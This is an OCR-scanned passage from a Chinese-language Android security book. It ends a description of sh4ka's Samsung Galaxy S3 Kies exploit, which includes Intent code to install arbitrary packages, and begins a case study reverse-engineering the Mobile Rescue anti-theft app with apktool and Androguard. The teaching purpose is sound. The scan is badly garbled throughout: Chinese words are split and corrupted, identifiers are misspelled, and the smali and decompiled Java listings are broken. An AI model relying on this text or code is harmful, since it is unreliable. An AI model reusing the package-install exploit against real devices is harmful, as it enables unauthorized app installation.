在 这 里 ,sh4ka 的 代码 创建 了 一 个 以 com.android.clipboardsaveservice.CLIPBROARD_ 
SAVE_SERVICE 为 目标 的 Intent, 并 在 传递 的 extra 域 中 包含 了 程序 包 的 源 路 径 ( 位 于 他 的 概念 验 
证 攻击 代码 应 用 的 数据 存储 目录 )， 以 及 目标 路 径 为 /sdcardrestore。 对 startService 函数 的 调 
用 会 发 送 这 个 Intent， 然 后 clipboaraqservice 便 将 APK 复制 到 /sdcard。 所 有 这 些 动作 在 概念 




















验证 攻击 应 用 没有 WRITE_EXTERNAL_STORAGE 权限 时 也 能 正常 工作 。 
最 后 开始 致命 一 击 ， 构 造 一 个 适当 的 Intent 发 送 给 Kies， 获 取 任意 程序 包 安 


Intent intentStartRestore = 


new Intent ("com.intent.action.KIES_START_ RESTORE_APK"); 


装 的 机 会 : 





intentStartRestore.putExtra("head", 
intentStartRestore.putExtra("body", 
sendBroadcast (intentStartRestore); 


new String("cocacola") .ge 
new String("cocacola") .ge 


tBytes ()); 
tBytes ()); 
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关于 sh4ka 工作 的 更 多 信息 ， 请 查看 他 的 那 篇 博客 文章 ， 网 址 为 http:/sh4ka.fr/android/ 
galaxys3/from Operm to INSTALL _ PACKAGES on _ galaxy S3.html。 


4.2 ”案例 分 析 : 移动 安全 应 用 


本 节 将 示范 对 一 个 移动 安全 / 防 窍 Android 应 用 进行 安全 评估 的 完整 过 程 。 这 一 过 程 将 引入 进 
行 静态 与 动态 分 析 的 工具 和 技术 , 你 也 可 以 看 到 如 何 进 行 一 些 基本 的 逆向 工程 分 析 。 而 你 的 目标 
是 更 好 地 理解 如 何 攻击 应 用 中 特定 的 组 件 ， 如 何 发 现 一 些 有 趣 的 安全 漏洞 并 加 以 利用 。 


4.2.1 初步 剖析 


在 初步 剖析 阶段 , 你 需要 收集 目标 应 用 的 一 些 粗 略 信 息 , 从 而 对 所 要 分 析 的 对 象 有 个 大 致 的 
了 解 。 假 设 刚 开始 时 你 对 目标 应 用 几乎 一 无 所 知 〈 这 种 情况 有 时 也 被 称 为 “ 零 知 识 ” 或 “ 黑 盒 ” 
方法 ) 那么 对 应 用 开发 者 、 应 用 的 依赖 关系 ， 以 及 应 用 任何 其 他 值得 注意 的 属性 进行 了 解 ， 是 
非常 重要 的 。 这 将 帮助 你 决定 在 后 续 阶 段 利 用 哪些 技术 , 另外 这 一 阶段 也 可 能 会 揭露 出 一 些 安全 
问题 ， 比 如 利用 了 带 有 已 知 安全 漏洞 的 代码 库 或 Web 服务 。 

首先 ， 对 这 个 应 用 的 目标 、 开 发 者 、 开 发 历史 或 评论 进行 大 致 的 了 解 ， 比 如 说 由 同一 位 开发 
者 开发 的 多 个 应 用 都 存在 许多 安全 漏洞 记录 ,那么 这 个 应 用 也 很 可 能 存在 安全 问题 。 图 4-3 显示 
了 在 Google Play 商店 页 面 中 一 款 移动 设备 恢复 与 反 卷 应 用 的 基本 信息 。 























Description 
W Tweet 
Mobile Rescue 
ABOUT THIS APP 
Keep your mobile phone safe and sound 
RATING: 
六 六 交 次 
Mobile Rescue is part of your mobile insurance with Virgin Media. As soon as you activate it (155) 
on your phone, you're covered against loss or theft. UPDATED: 
April23, 2013 
With Mobile Rescue, you can... CURRENT VERSION: 
* Back up your mobile address book and transfer your contacts to a new or replacement REQUIRES ANDROID: 
phone 2.2and up 
CATEGORY: 
* Lock your phone from your computer if its missing or stolen. Once it's locked, it can't be Tools 
used without you unlocking it, even if the SIM is changed. INSTALLS: 


100,000 - 500,000 
* Track down your lost phone by setting off an alarm and checking where it is on a map. | 


* If your phone's lost or stolen, first lock it with Mobile Rescue and then call Virgin Media and | 
they'l block the SIM card for you. That way, no one can put your SIM in another phone and L 


use it to make calls. Foe 
SIZE: 

Keywords: virgin mobile, phone locator, phone locate, anti virus protection, antivirus for a5M 

android, antivirus free, phone lock, free security apps, security lock, security alarm, malware PRICE 

protection, block calls, block numbers, block text messages, block sms messages, block Ee 


sms and calls, call blocker, remote lock, lookout mobile security, privacy guard, anti theft CONTENT RATING: 
alarm, find phone, phone finder. Competing apps include: avg, lookout, netqin, webroot, Cow Matty 
bitdefender, mcafee, eset, avast, trend micro, kaspersky 


图 4-3 在 Google Play 商店 中 的 应 用 描述 
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当 你 仔细 审查 这 一 条 目 时 ,你 会 发 现 这 款 应 用 会 请 求 许多 权限 。 这 款 应 用 被 安装 后 ,将 会 获 
取 到 第 三 方 应 用 所 能 申请 到 的 最 大 权限 。 单 击 页 面 中 的 “Permissions” 《 权限 ) 选项 ， 你 可 以 看 
到 这 款 应 用 到 底 请 求 了 哪些 权限 ， 如 图 4-4 所 示 。 





Permissions 


THIS APPLICATION HAS ACCESS TO THE FOLLOWING: 


SERVICES THAT COST YOU MONEY 


DIRECTLY CALL PHONE NUMBERS 

Allows the app to call phone numbers without your intervention. This may result in unexpected charges or calls. Note 
that this doesn't allow the app to call emergency numbers. Malicious apps may cost you money by making calls 
without your confirmation. 

SEND SMS MESSAGES 

Allows the app to send SMS messages. This may result in unexpected charges. Malicious apps may cost you 
money by sending messages without your confirmation. 


HARDWARE CONTROLS 


TAKE PICTURES AND VIDEOS 


Allows the app to take pictures and videos with the camera. This permission allows the app to use the camera at any 
time without your confirmation. 


YOUR LOCATION 


PRECISE LOCATION (GPS AND NETWORK-BASED) 

Allows the app to get your precise location using the Global Positioning System (GPS) or network location sources 
such as cell towers and Wi-Fi. These location services must be tumed on and available to your device for the app to 
use them. Apps may use this to determine where you are, and may consume additional battery power. 
APPROXIMATE LOCATION (NETWORK-BASED) 

Allows the app to get your approximate location. This location is derived by location services using network location 
Sources such as cell towers and Wi-Fi. These location services must be tumed on and available to your device for 
the app to use them. Apps may use this to determine approximately where you are. 


YOUR MESSAGES 


RECEIVE TEXT MESSAGES (SMS) 
Allows the app to receive and process SMS messages. This means the app could monitor or delete messages sent 
to your device without showing them to you. 


图 4-4 目标 应 用 所 请 求 的 一 些 权限 


于 应 用 的 描述 和 所 列 出 的 申请 权限 ， 可 以 得 出 一 些 结论 。 例 如 ， 描 述 中 提 及 了 远程 加 锁 、 
ee 和 警 ， 这 些 再 结合 上 READ_sMs 权限 ,会 让 你 认为 应 用 使 用 了 SMS 短信 作为 带 外 通 
信 (out-of-band communication )， 这 在 移动 杀毒 软件 中 是 非常 普遍 的 。 我 们 对 此 做 个 笔记 ， 因 为 
这 意味 着 你 可 能 需要 检查 一 些 收取 短信 的 代码 。 


4.2.2 静态 分 析 


静态 分 析 阶 段 涉及 在 不 直接 运行 应 用 的 情况 下 , 分 析 应 用 及 其 支持 组 件 中 的 代码 和 数据 。 首 
先 可 以 识别 应 用 中 的 一 些 有 趣 字 符 串 ， 如 硬 编码 URI、 0 钥 。 接着 可 以 尝试 进行 其 他 
一 些 分 析 以 构建 调用 图 、 确 定 应 用 逻辑 和 程序 流程 ， 以 及 发 现 潜在 的 安全 问题 。 

尽管 Android SDK 提供 了 一 些 有 用 的 工具 (如 aexaqump ) 来 反 汇 编 classes.dex， 但 你 还 可 以 
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从 APK 的 其 他 文件 中 找到 一 些 其 他 的 有 用 信息 。 这 些 文件 格式 多 样 ( 如 二 进 制 XML 文件 )， 难 
以 用 grep 这 样 的 常用 工具 读 取 。 但 是 你 可 以 使 用 apktool 工具 (可 从 https://code.google.com/ 
p/android-apktool/ 获 取 ), 将 这 些 资源 转换 成 明文 , 也 可 以 将 Dalvik 可 执行 字 节 码 反 汇 编 为 一 种 被 
称 为 smali 的 中 间 格 式 〈 后面 会 有 许多 smali 格式 的 代码 )。 
以 APK 文件 作为 参数 运行 apktool ad 命令 ,来 解码 APK 的 内 容 ， 并 将 解 出 的 文件 都 放置 
到 以 APK 名 称 生成 的 目录 中 。 


~$ apktool d ygib-1.apk 
I: Baksmaling... 
I: Loading resource table... 


I: Decoding values */* XMLs... 
I: Done. 
I: Copying assets and libs. 


现在 你 就 可 以 使 用 grep， 在 应 用 平 委 欣 语 如 URL 之 类 的 有 趣 字 符 串 , 这 可 以 帮助 你 理解 应 
用 和 Web 服务 之 间 的 通信 。 你 也 可 以 使 用 grep 来 忽略 对 schemas .android.com 的 引用 ， 后 
者 是 一 个 常见 的 XML 命名 空间 字符 串 。 


~$ grep -Eir "https?://" ygib-1 | grep -Vv "schemas.android.com" 




















ygib-1/smali/com/yougetitback/androidapplication/settings/xml/ 
XmlOperator.smali: 

const-string v2, "http://csl.ucc.ie/~yx2/upload/upload.php" 
ygib-1l/res/layout/main.xml:xmlns:ygib="http://ww.ywlx.net/apk/res/ 
com.yougetitback.androidapplication.cpw.mobile"> 
ygib-1l/res/values/strings.xml: <string name="mustenteremail">Please enter 
a previous email address if you already have an account on 
https://virgin.yougetitback.com or a new email address 

f you wish to have a new account to control this device.</string> 
ib-l/res/values/strings.xml: <string name="serverUrl"> 
tps://virgin.yougetitback.com</string> 
ib-1l/res/values/strings.xml:Please create an account on 
tps://virgin.yougetitback.com 

fore activating this device"</string> 
ib-l/res/values/strings.xml: <string name="showsalocation"> 
tp://virgin.yougetitback.com/showSALocation?cellid=</string> 
ib-l/res/values/strings.xml: <string name="termsofuse"> 
tps://virgin.yougetitback.com/terms_of_ use</string> 
gib-1l/res/values/strings.xml: <string name="eula" 
https://virgin.yougetitback.com/eula</string> 
gib-1l/res/values/strings.xml: <string name="privacy"> 
tps://virgin.yougetitback.com/privacy_policy</string> 
ygib-1l/res/values/strings.xml: 
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<string name="registration _ succeed text"> 

Account Registration Successful, you can now use the 

email address and password entered to log in to your personal vault on 
http ://virgin.yougetitback.com</string> 
ygib-1l/res/values/strings.xml: 
<string name="registrationerror5">ERROR:creating user account. 
Please go to http://virgin.yougetitback.com/forgot_ password 
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where you can reset your password, alternatively enter a new 

email and password on this screen and we will create a new account for you. 
Thank You.</string> 

ygib-1l/res/values/strings.xml: <string name="registrationsuccessful"> 
Congratulations you have sucessfully registered. 

You can now use this email and password provided to 

login to your personalised vault on http://virgin.yougetitback.com 
</string> 

ygib-1l/res/values/strings.xml: <string name="link accessvault"> 
https://virgin.yougetitback.com/vault</string> 
ygib-1l/res/values/strings.xml: <string name="text_help"> 

Access your online vault, or change your password at &lt;a> 
https://virgin.yougetitback.com/forgot_ password&lt;/a></string> 


尽管 apktool 和 通用 UNIX 实用 程序 都 提供 了 许多 帮助 ， 但 是 你 还 需要 一 些 更 加 强力 的 工 
具 。 在 本 例 中 ， 需 要 考虑 基于 Python 的 逆向 工程 和 分 析 框 架 Androguard。 尽 管 Androguard 包含 
了 适合 执行 特定 任务 的 一 些 实用 程序 ， 但 本 章 主 要 关注 以 交互 模式 运行 的 androlyze 工具 , 它 
提供 了 一 个 IPython shell。 对 于 初学 者 而 言 ， 只 需 使 用 AnalyzeAPK 方法 创建 表示 APK、 资 源 与 
dex 代码 的 恰当 对 象 ,并 添加 一 个 使 用 qaa 反 编译 器 的 选项 ,就 可 以 将 dex 代码 转换 回 Java 伪 码 。 


~S androlyze.py -S 
In [1]: a,d,dx = AnalyzeAPK("/home/ahh/ygib-1.apk",decompiler="dad") 


接 下 来 ,收集 应 用 的 其 他 一 些 粗略 信息 ， 用 来 确认 你 在 初始 剖析 环节 看 到 的 内 容 。 其 中 包括 
了 解 应 用 使 用 了 哪些 权限 ,用 户 最 经 常 交 互 的 Activity ,应 用 运行 的 Service, 以 及 是 否 有 其 他 Intent 
接收 组 件 。 首 先 调用 permissions 命令 来 检查 权限 : 

In [23]: a.permissions 

OU [23 

['android.permission.CAMERA', 


'android.permission.CALL PHONE', 
'android.permission.PROCESS_OUTGOING_ CALLS', 






























































'android.permission.RECEIVE_SMS', 
'android.permission.ACCESS_GPS', 
'android.permission.SEND_SMS', 
'android.permission.READ_ SMS', 
'android.permission.WRITE_SMS', 





这 些 权 限 和 你 在 Google Play 商店 上 查看 这 一 应 用 时 所 看 到 的 应 该 是 一 致 的 。 你 可 以 进一步 
使 用 Androguard, 找 出 这 个 应 用 的 哪些 类 和 方法 实际 使 用 了 这 些 权限 , 这 可 能 会 帮 你 将 分 析 范 围 
缩小 到 一 些 有 趣 的 组 件 上 : 


In [28]: show_Permissions (dx) 

ACCESS_NETWORK_STATE : 

1 Leom/yougetitback/androidapplication/PingService;->deviceOnline()zZ 
(0x22) ---> Landroid/net/ConnectivityManager;- 

>getAllNetworkInfo() [Landroid/net/NetworkInfo; 

1 Leom/yougetitback/androidapplication/PingService;->wifiAvailable()z 
(0x12) ---> Landroid/net/ConnectivityManager;-— 


4.2 ”案例 分 


析 : 移动 安全 应 用 





>getActiveNe 
SEND_SMS 

>sendActivat 
Ljava/lang/s 


>getDefault( 
| Leom/youge 


| Leom/youget 


tworkInfo()Landroid/net/NetworkIn 


itback/androidapplication/Activa 
ionRequestMessage (Landroid/conten 
tring;)V (Ox2) 
)Landroid/telephony/SmsManager; 

titback/androidapplication/Activa 


Fe 


teSscreen;- 
t/Context; 


---> Landroid/telephony/SmsManager;- 





teSscreen; 


->sendActivationRequestMessage (Landroid/content/Context; 


INTERNET 
Lecom/youget 








让 itback/androidapplication/ActivationAcknowledgeService;- 
>doPost (Ljava/lang/String; Ljava/lang/String;)ZzZ (0xe) 
Ljava/net/URL;->openConnection()Ljava/net/URLConnection; 
Lcom/yougetitback/androidapplication/ConfirmpinScreen;->doPost( 
Daa lame / oteino. Ljava/lang/String;)ZzZ (0xe) 


Ljava/net/URL;->openConnection()Ljava/net/URI 


A 























-一 一 > LConnection; 


尽管 输出 结果 比较 见长 ,但 是 经 过 修剪 的 代码 片段 还 
ConfirmPinScreen 类 中 的 doPost i 这 一 方法 使 用 了 a 








ndroid.permission.INT 


a 
Ee 








不 是 显示 出 了 一 些 有 趣 的 方法 ， 如 


RN] 





ET 
E 


权限 ， 因 而 在 某 个 时 间 点 肯定 会 打开 一 个 套 接 字 。 你 可 以 继续 深入 分 析 , 在 androlyze 中 调用 





目标 方法 的 show 函数 ， 来 对 这 个 方法 进行 反 汇编 以 了 解 调用 该 方法 会 发 生 什么 。 


In [38]: d.CLASS_ Lcom yougetitback_androidapplication ConfirmPinScreen . 
METHOD_doPost .show () 

划 夺 太 六 提 间 ##### Method Information 
Lcom/yougetitback/androidapplication/ConfirmPpinScreen;- 

>doPost (Ljava/lang/String; 


Ljava/lang/String;)ZzZ [access_flags=private] 
划 提 夺 扩 提 提 #### Params 
- local registers: v0...v1i0 


- vll:java.lang.String 
- Vl2:java.lang.String 
- return :boolean 

持 提 扩 井 扩 夺 并 守 井村 井 扩 守 并 社 井 扩 井 提 奉 


尖 尖 尖 尖 尖 寺 天 大 天 守 大 寺 天 志 大 大 尖 大 天 大 天 大大 


doPost-BB@0Ox0 











0 (00000000) const/4 v6, 0 

1 (00000002) const/4 v5, 1 [ doPost-BB@Ox4 ] 
doPost-BB@Ox4 

2 (00000004) new-instance v3, Ljava/net/URL; 

3 (00000008) invoke-direct v3, v11l, Ljava/net/URL;-><init> 
(Ljava/lang/String;)yV 

4 (0000000e) invoke-virtual V3, Ljava/net/URL;- 
>openConnection() 
Ljava/net/URLConnection; 

5 (00000014) move-result-object v4 

6 (00000016) check-cast v4, Ljava/net/HttpURLConnection; 

7 (0000001a) iput-object V4, V10, Lecom/yougetitback/ 
androidapplication/ConfirmPpinScreen;->con Ljava/net/HttpURLConnection; 

8 (0000001e) iget-object v4, v10, Lcom/yougetitback/ 
androidapplication/ConfirmpinScreen;->con Ljava/net/HttpURLConnection; 
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9 (00000022) const-string V7, 'POST ' 
10 (00000026) invoke-virtual V4, v7, Ljava/net/HttpURLConnec- 
tion; 
->setRequestMethod (Ljava/lang/String;)V 
11 (0000002c) iget-object v4, Vv10, Locom/yougetitback/ 


androidapplication/ConfirmpPpinScreen;->con Ljava/net/HttpURLConnection; 





12 (00000030) const-string V7, 'Content-type ' 

13 (00000034) const-string v8, 'application/ 
XxX-www-form-urlencoded' 

14 (00000038) invoke-virtual V4, v7, v8, Ljava/net/ 
HttpURLConnection;->setRequestProperty (Ljava/lang/String; Ljava/lang/String;) 
V 

15 (0000003e) iget-object v4, v10, Lcom/yougetitback/ 


androidapplication/ConfirmPpinScreen;->con Ljava/net/HttpURLConnection; 





31 (00000084) const-string V7, 'User-Agent ' 

32 (00000088) const-string v8, 'Androiqd Client ' 

49 (000000d4) iget-object V4, Vv10, Locom/yougetitback/ 
androidapplication/ConfirmpPpinScreen;->con Ljava/net/HttpURLConnection; 

50 (000000d8) const/4 v7, 1 

51 (000000da) invoke-virtual v4, v7, Ljava/net/ 
HttpURLConnection; 
->setDoInput (Z)V 

52 (000000e0) iget-object v4, v1i0, Lecom/yougetitback/ 
androidapplication/ConfirmpPpinScreen;->con Ljava/net/HttpURLConnection; 

53 (000000e4) invoke-virtual v4, Ljava/net/HttpURLConnection; 


->connect ()V 


首先 你 看 到 关于 DalvikVM 人 处 型 


这 一 方法 对 象 分 配 的 基本 信息 ,以 及 这 一 方法 本 身 的 标识 符 。 








在 接 下 来 的 实际 反 汇 编 代 码 中 , java.net .Http 
象 的 connect 方法 的 调用 ， 都 确认 了 对 INT 

















[DJ 


RNI 
你 可 以 通过 对 同一 方法 调用 其 source 也 数 ， 


URLConnection 等 对 象 的 实例 化 , 以 及 这 一 对 
eT 权限 的 使 用 。 
对 这 个 方法 进行 反 编 译 , 来 获得 一 个 可 读 性 更 














好 的 版 本 ， 反 编译 的 返回 结果 可 以 有 效 地 恢复 出 Java 源 代 码 。 








In [39]: d.CLASS_ Lcom yougetitback_androidapplication ConfirmPinScreen . 
METHOD_doPost .source() 
private boolean doPost (String p11, String p12) 
{ 
this.con = new java.net.URL(p11) .openConnection(); 
this.con.setRequestMethod ("POST"); 
this.con.setRequestProperty ("Content-type", 
"application/x-www-form-urlencoded"); 
this.con.setRequestProperty ("Content-Length", new 
StringBuilder() .append (p12.length()).toSstring()); 
this.con.setRegquestProperty ("Connection", "keep-alive"); 
this.con.setRequestProperty ("User-Agent", "Android Client"); 
this.con.setRequestProperty ("accept", "*/*"),; 
this.con.setRegquestProperty ("Http-version", "HTTP/1.1"); 
this.con.setRequestProperty ("Content-languages", "en-EN"); 
this.con.setDoOutput (1) ; 
this.con.setDoInput (1) ; 
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this.con.connect (); 
V2 = this.con.getOutputStream(); 
V2 .write(pl2.getBytes ("UTF8")); 
v2.flush(); 
android.util.Log.d("YGIB Test", new 
StringBuilder ("con.getResponseCode()— 
>") .append (this.con.getResponseCode()).toSstring()); 
android.util.Log.d("YGIB Test", new StringBuilder( 
"urlString-->") .append (p11) .toString ()); 
android.util.Log.d("YGIB Test", new StringBuilder("content-->"). 
append (p12) .toString() ) ， 








注意 需要 注意 到 反 编 译 结果 并 不 是 完美 的 ， 这 部 分 2 DalvikVM 和 Java 虚拟 机 之 间 的 差 
异 。 在 两 种 虚拟 机 中 控 币 1 流 和 数据 流 的 不 同 表 达 玫 式 了 影响 hh 从 Dalvik 字 节 码 到 Java 伪 
码 的 转换 效果 。 


你 可 以 看 到 对 andaroiq.util.Log.d 的 调用 ， 该 方法 将 消息 写 和 人 拥有 调试 优先 级 的 日 志 i 
录 器 中 。 在 本 例 中 , 应 用 看 起 来 对 HTTP 请 求 的 详细 信息 进行 了 记录 ,这 会 A 
泄露 。 你 随后 就 可 以 查看 日 志 的 详细 信息 。 现 在 ,查看 下 这 Oe 中 可 能 存在 哪些 IPC 端点 。 先 
通过 调用 get_activities 方法 来 看 看 Activity。 


In [87]: a.get_activities() 

Out [87]: 
['com.yougetitbac 
'com.yougetitbac 
'com.yougetitbac 
'com.yougetitbac 








.androidapplication.ReportSplashScreen', 
.androidapplication.SecurityQuestionScreen', 
.androidapplication.SplashScreen', 
.androidapplication.MenuScreen', 


WY A 


.androidapplication.settings.setting.Setting '， 
.androidapplication.ModifyPinScreen', 
.androidapplication.ConfirmPpinScreen', 
.androidapplication.EnterRegistrationCodeScreen', 


'com.yougetitbac 
'com.yougetitbac 
'com.yougetitbac 
'com.yougetitbac 

















In [88]: a.get_ main activity () 
Out[88]: u'com.yougetitback.androidapplication.ActivateSplashScreen ' 


不 出 所 料 ， 这 个 应 用 有 许多 个 Activity， 其 中 包括 刚刚 分 析 过 的 confirmPinScreen。 接 下 
来 通过 调用 get_services 方法 来 检查 Service。 


In [113]: a.get_services() 

Out [113]: 
['com.yougetitback.androidapplication.DeleteSmsService', 
'com.yougetitback.androidapplication.FindLocationService', 
'com.yougetitback.androidapplication.PostLocationService', 




















'com.yougetitback.androidapplication.LockAcknowledgeService', 
'com.yougetitback.androidapplication.ContactBackupService', 
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'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 


'com.yougetitback.androidapplica 





tion.ContactRestoreService', 
tion.UnlockService', 
tion.PingService', 
tion.UnlockAcknowledgeService', 


tion.wipe.MyService', 


从 其 中 某 些 Service 的 命名 表示 (如 Unlockservice 和 wipe ) 来 看 ,它们 很 可 能 在 某 些 事 
件 触 发 时 从 其 他 应 用 组 件 中 获取 并 人 处理 命令 。 接 下 来 , 使 用 get_receivers 方法 来 查看 应 用 中 


的 Broadcast Receiver。 





In [115]: a.get_receivers() 

Ont, [Es 
['com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 
'com.yougetitback.androidapplica 














tion.settings.main.Entrance$sMyAgdmin', 
tion.MyStartupIntentReceiver', 
tion.SmsIntentReceiver', 
tion.IdleTimeout', 
tion.PingTimeout', 
tion.RestTimeout', 
tion.SplashTimeout', 
tion.EmergencyTimeout', 
tion.OutgoingCallReceiver', 
tion.IncomingCallReceiver', 
tion.IncomingCallReceiver', 
tion.NetworkStateChangedReceiver', 
tion.C2DMReceiver'] 





非常 确定 的 是 ， 你 找到 了 一 个 看 起 来 与 处 理 短信 息 相 关 的 Broadcast Receiver， 而 SMS 短信 
很 可 能 作为 对 设备 进行 加 锁 或 者 擦 除 的 带 外 通信 渠道 。 因为 应 用 请 求 了 READ_sms 权限 , 所 以 你 
看 到 了 一 个 特意 命名 为 SmsIntentReceiver 的 Broadcast Receiver， 应 用 的 Manifest 文件 中 很 
有 可 能 包含 了 匹配 SMS_RECEIVED 广播 的 Intent 过 滤器 。 可 以 在 anarolyze 工具 中 使 用 少数 几 
行 Python 代码 ， 查 看 AndroidManifest.xml 的 内 容 。 














In [77]: for e in x.getElementsByTagName ("receiver") 


print e.toxml () 


<receiver android:enabled="true" android:exported="true" android:name= 
"com.yougetitback.androidapplication.SmsIntentReceiver"> 
<intent-filter android:priority="999"> 

<action android:name="android.provider.Telephony .SMS_RECEIVED"> 


</action> 
</intent-filter> 
</receiver> 


注意 还 可 以 使 用 Androguard 中 的 androaxml.py 工具， 执行 一 条 命令 即 可 获取 Android 


Manifest.xml 文件 中 的 数据 。 
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在 AndroidManifest 文件 中 ， 有 一 个 特意 为 com.yougetitback.androidapplication. 
r 类 定义 的 Receiver XML 元 素 。 其 中 包含 一 个 Intent 过 滤 吉 的 XML 元 素 ， 
roid:priority 元 素 的 值 为 999, 并 接收 从 androigd.provider.Telephony 


SmsIntentReceive 


显 式 地 指定 了 and 











类 发 来 的 SMS_RECEIVED 动作 。 通 过 指定 这 一 优先 值 ， 目 标 应 用 可 以 确保 首先 获得 
SMS_RECEIVED 广播 消息 ， 从 而 在 默认 短信 应 用 之 前 访问 到 短信 内 容 。 














对 smsIntentReceiver 类 调用 get_methods 方法 ， 可 以 查看 到 该 类 有 哪些 可 用 的 方法 。 
接着 我 们 快速 写 一 个 Python 的 for 循环 ， 对 每 个 返回 方法 调用 show_info 函数 : 


[L728]: for metli in dC 
SmsIntentReceiver.get_met 
meth.show_info() 


In LASS_Lcom yougetitback_ androidapplication_ 


hods () 


并 并 提 条 Method Information 

Lecom/yougetitback/androidapplica 
access_flags=public constructor 
莫非 六 六 间 ##### Method Information 
Lecom/yougetitback/androidapplicat 
>foregroundUI (Landroid/content/Context; 
莫 守 太 六 间 ##### Method Information 
Lecom/yougetitback/androidapplication/SmsIin 
>getAction(Ljava/lang/String;)Ljava/lang/s 
莫非 闪 六 提 ##### Method Information 
Lecom/yougetitback/androidapplication/SmsIin 





tion/SmsIin tReceiver;-><init>()V 


] 


社 EO 


tentReceiver;-— 
[access_flags=privatel] 


ion/SmsIn 
)V 


本 


tReceiver;-— 
[access_flags=privatel] 


Ei ten 


tring; 














ti tentReceiver;-— 


Cen 


>getMessagesFromIntent (Landroid/content/In 


pa) 





Landroid/ 
Lecom/youge 


telephony/SmsMessage; 
tback/androidappl 


[access_flags 
ion/SmsIn 

















对 < 四 ten 


privatel] 





tReceiver;-— 





>processBackupMsg (Landroid/content/Context 
Ljava/util/Vector;)V [access_flags=private] 
莫 提 六 六 提 ##### Method Information 

Lecom/yougetitback/androidapplication/SmsIin 
(Landroid/content/Context; Landroid/conten 


’ 











tentReceiver;->onReceive 
t/Intent;)V [access_flags=public] 








对 于 Broadcast Receiver 而 言 ，onReceive 方法 是 其 和信 口 点 ， 因 此 你 可 以 查看 这 个 方法 的 交 
又 引 用 (简称 为 xrefs ), 从 这 一 方法 获得 控制 流 图 的 概貌 。 首 先 使 用 a .creat_xref 来 创建 交叉 
引用 ， 然 后 调用 onReceive 方法 对 应 对 象 的 show_xref 函数 。 


In [206]: d.create_ xref() 





[207]: d.CLASS_Lcom yougetitback_androidapplication_ SmsIntentReceiver. 
METHOD_onReceive.show_ xref() 

社 井 打非 间 提 # 间 # 又 REF 

Leom/youge 
isValidMessage 
T: Lecom/youge 
processConten 
T: Lecom/youge 
triggerAppLaunc 
V 9a 
T: Lecom/youge 


mm. 


titback/androidapplication/SmsIntentReceiver; 
(Ljava/lang/String; Landroid/content/Context; 
tbhack/androidapplication/SmsIntentReceiver; 
(Landroid/content/Context; Ljava/lang/String; 
tbhack/androidapplication/SmsIntentReceiver; 


h (Landroid/content/Context; Landroid/telephony/SmsMessage; 


)2 6c 
[ : 巧 汪 


)V 78 


和 


让 


) 
































[: titback/androidapplication/SmsIntentReceiver; 
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GetMessagesFromIntent (Landroid/content/Intent;) 
[Landroid/telephony/SmsMessage; 2a 

T: Lecom/yougetitback/androidapplication/SmsIntentReceiver; isPinLock 
(Ljava/lang/String; Landroid/content/Context;)Z 8a 

提 提 提 持 提 提 扩 提 夺 扩 提 持 打 提 持 提 井 扩 提 划 


可 以 看 到 onReceive 方法 调用 了 其 他 一 些 方法 ,包括 一 些 看 起 来 像 是 在 验证 短信 与 解析 内 
容 的 方法 。 下 面 对 这 些 方法 进行 反 编译 分 析 ， 从 getMessagesFromIntent 开始 : 

In [213]: d.CLASS_Lcom yougetitback androidapplication SmsIntentReceiver . 

METHOD_getMessagesFromIntent.source () 


private android.telephony.SmsMessage[] 
getMessagesFromIintent (android.content.Intent rp9) 


{ 
v6 
v0 
i 


V5 





3 
= p9.getExtras ();} 
(vO le 0 
V4 = v0O.get ("pdus"); 
V5 = new android.telephony.SmsMessagel[lv4.length]; 
V3 Er0s 
while (v3 < v4.length) { 
[v3] = android.telephony.SmsMessage.createFromPpdu (v4[v3]); 
V3++} 
} 
V6 =D 


return v6; 


} 


这 是 一 段 非 

















常 典型 的 从 Intent 中 提取 短信 协议 数据 单元 (PDU ) 的 代码 。 可 以 看 到 方法 调用 


的 p9 参数 中 包含 着 Intent 对 象 , 而 vo 是 调用 p9 .getExtras 后 返回 的 结果 , 其 中 包含 了 Intent 
中 的 所 有 extra 对 象 。 接 下 来 ，v0 .get ("pdus") 被 调用 来 提取 PDU 的 字 节 数组 ， 并 被 放置 到 
v4 中 。 该 方法 然后 从 v4 创建 了 一 个 smsMessage 对 象 ， 将 其 赋值 给 v5， 通 过 循环 来 对 v5 的 











数组 元 素 进行 赋值 。 最 后 ， 通 过 一 个 看 起 来 很 奇怪 的 途径 (很 可 能 是 由 反 编 译 过 程 引 入 的 )，v6 
又 被 赋值 为 v5 对 应 的 smsMessage 对 象 ， 并 返回 给 调用 者 。 


对 onReceive 方法 进行 反 编译 , 可 以 看 到 在 调用 getMessagesFromIntent 之 前 , 共享 配 
置 文件 SuperheroPrefsFile 被 方法 读 取 。 在 这 个 实例 中 ，p8 对 象 代 表 应 用 的 上 下 文 状态 ， 它 和 


























de 





getSharedPr 


Ferences 方法 被 调用 。 在 getMessagesFromIntent 调用 之 后 ， 另 外 又 调用 


了 一 些 方 法 来 确保 短信 和 是 有 效 的 (isvalidMessage )， 最 终 消 息 的 内 容 被 处 理 (process 
content )， 所 有 这 些 调用 都 以 p8 对 象 作 为 一 个 参数 。 这 很 可 能 是 因为 SuperheroPrefsFile 文件 








中 包含 某 些 与 操 


作 过 程 都 相关 的 东西 ， 如 一 个 密 钥 或 PIN 码 。 





In [3]: d.CLASS Lcom yougetitback androidapplication SmsIntentReceiver. 
METHOD_onReceive.source() 

public void onReceive(android.content.Context p8, 
android.content.Intent p9) 


{ 
p38 
站 


.getSharedPreferences ("SuperheroprefsFile", 0); 
(p9 .getAction() .equals(" 
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andqroid.provider.Telephony .SMS_RECEIVED") != 0) { 
this.getMessagesFromIntent (p9); 
Ef (Enis a.0) { 
YL ss 
while (vl < this.length) { 
if (this[vi] != 0) { 
V2 = this[vi] .getDisplayMessageBody (); 
if ((v2 != 0) && (v2.length() > 0)) { 
android.util.Log.i("MessageListener:", v2); 
this.isVvalidMessage (v2, p8); 
(0 A 
this.isPinLock (v2, p8); 
Tf (0, 并 


this.triggerAppLaunch (p8, this[lv1l]); 
this.abortBroadcast (); 





} 
} else { 
this.processContent (p8, v2); 
this.abortBroadcast (); 


